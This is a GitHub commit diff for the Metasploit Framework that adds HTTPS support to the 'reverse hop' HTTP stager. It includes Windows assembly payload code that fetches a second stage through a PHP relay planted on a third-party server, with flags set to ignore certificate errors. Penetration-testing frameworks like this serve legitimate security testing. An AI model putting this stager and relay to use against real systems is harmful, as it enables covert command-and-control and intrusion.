Skip to content

Commit 5654b6b

Browse files
author
Brent Cook
committed
Land rapid7#6227, reverse_hop_http updates and HTTPS unification
2 parents 25f2241 + 8703987 commit 5654b6b

File tree

4 files changed

+75
-14
lines changed

4 files changed

+75
-14
lines changed

data/php/hop.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -45,7 +45,7 @@ function findSendDelete($tempdir, $prefix, $one=true){
4545
//get data
4646
$postdata = file_get_contents("php://input");
4747
//See if we should send anything down
48-
if($postdata === "RECV\x00"){
48+
if($postdata === "RECV\x00" || $postdata === "RECV"){
4949
findSendDelete($tempdir, "down_" . sha1($url));
5050
$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
5151
}else{

lib/msf/core/handler/reverse_hop_http.rb

Lines changed: 20 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -82,7 +82,8 @@ def start_handler
8282
uri.port,
8383
{
8484
'Msf' => framework
85-
}
85+
},
86+
full_uri.start_with?('https')
8687
)
8788
@running = true # So we know we can stop it
8889
# If someone is already monitoring this hop, bump the refcount instead of starting a new thread
@@ -185,6 +186,19 @@ def remove_resource(res)
185186
lock.unlock
186187
end
187188

189+
#
190+
# Implemented for compatibility reasons
191+
#
192+
def resources
193+
handlers
194+
end
195+
196+
#
197+
# Implemented for compatibility reasons, does nothing
198+
#
199+
def deref
200+
end
201+
188202
#
189203
# Implemented for compatibility reasons, does nothing
190204
#
@@ -250,19 +264,22 @@ def initialize(info = {})
250264
#
251265
def send_new_stage(uri)
252266
# try to get the UUID out of the existing URI
253-
info = process_uri_resource(uri)
267+
info = process_uri_resource(uri.to_s)
254268
uuid = info[:uuid] || Msf::Payload::UUID.new
255269

256270
# generate a new connect
257271
sum = uri_checksum_lookup(:connect)
258272
conn_id = generate_uri_uuid(sum, uuid)
259273
conn_id = conn_id[1..-1] if conn_id.start_with? '/'
260274
url = full_uri + conn_id + "/\x00"
275+
fulluri = URI(full_uri + conn_id)
261276

262277
print_status("Preparing stage for next session #{conn_id}")
263278
blob = stage_payload(
264279
uuid: uuid,
265-
uri: conn_id
280+
uri: fulluri.request_uri,
281+
lhost: uri.host,
282+
lport: uri.port
266283
)
267284

268285
#send up

lib/msf/core/payload/transport_config.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -55,8 +55,8 @@ def transport_config_reverse_http(opts={})
5555

5656
{
5757
:scheme => 'http',
58-
:lhost => opts[:lhost],
59-
:lport => opts[:lport].to_i,
58+
:lhost => opts[:lhost] || datastore['LHOST'],
59+
:lport => opts[:lport].to_i || datastore['LPORT'].to_i,
6060
:uri => uri,
6161
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
6262
:retry_total => datastore['SessionRetryTotal'].to_i,

modules/payloads/stagers/windows/reverse_hop_http.rb

Lines changed: 52 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -16,13 +16,14 @@ module Metasploit3
1616

1717
def initialize(info = {})
1818
super(merge_info(info,
19-
'Name' => 'Reverse Hop HTTP Stager',
19+
'Name' => 'Reverse Hop HTTP/HTTPS Stager',
2020
'Description' => %q{
21-
Tunnel communication over an HTTP hop point. Note that you must first upload
21+
Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload
2222
data/hop/hop.php to the PHP server you wish to use as a hop.
2323
},
2424
'Author' => [
2525
'scriptjunkie <scriptjunkie[at]scriptjunkie.us>',
26+
'bannedit',
2627
'hdm'
2728
],
2829
'License' => MSF_LICENSE,
@@ -48,6 +49,15 @@ def stage_over_connection?
4849
false
4950
end
5051

52+
#
53+
# Generate the transport-specific configuration
54+
#
55+
def transport_config(opts={})
56+
config = transport_config_reverse_http(opts)
57+
config[:scheme] = URI(datastore['HOPURL']).scheme
58+
config
59+
end
60+
5161
#
5262
# Generate the first stage
5363
#
@@ -188,12 +198,24 @@ def generate
188198
pop ecx
189199
xor edx, edx ; NULL
190200
push edx ; dwContext (NULL)
191-
push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
192-
;0x80000000 | ; INTERNET_FLAG_RELOAD
193-
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
194-
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
195-
;0x00000200 | ; INTERNET_FLAG_NO_UI
196-
;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
201+
EOS
202+
203+
if uri.scheme == 'http'
204+
payload_data << ' push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
205+
else
206+
payload_data << ' push (0x80000000 | 0x00800000 | 0x00001000 | 0x00002000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
207+
end
208+
# 0x80000000 | ; INTERNET_FLAG_RELOAD
209+
# 0x00800000 | ; INTERNET_FLAG_SECURE
210+
# 0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
211+
# 0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
212+
# 0x80000000 | ; INTERNET_FLAG_RELOAD
213+
# 0x04000000 | ; INTERNET_NO_CACHE_WRITE
214+
# 0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
215+
# 0x00000200 | ; INTERNET_FLAG_NO_UI
216+
# 0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
217+
payload_data << <<EOS
218+
197219
push edx ; accept types
198220
push edx ; referrer
199221
push edx ; version
@@ -223,6 +245,28 @@ def generate
223245
try_it_again:
224246
dec ebx
225247
jz failure
248+
249+
EOS
250+
if uri.scheme == 'https'
251+
payload_data << <<EOS
252+
set_security_options:
253+
push 0x00003380
254+
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
255+
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
256+
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
257+
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
258+
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
259+
mov eax, esp
260+
push 0x04 ; sizeof(dwFlags)
261+
push eax ; &dwFlags
262+
push 0x1f ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
263+
push esi ; hRequest
264+
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
265+
call ebp
266+
267+
EOS
268+
end
269+
payload_data << <<EOS
226270
jmp.i8 httpsendrequest
227271
228272
dbl_get_server_host:

0 commit comments

Comments
 (0)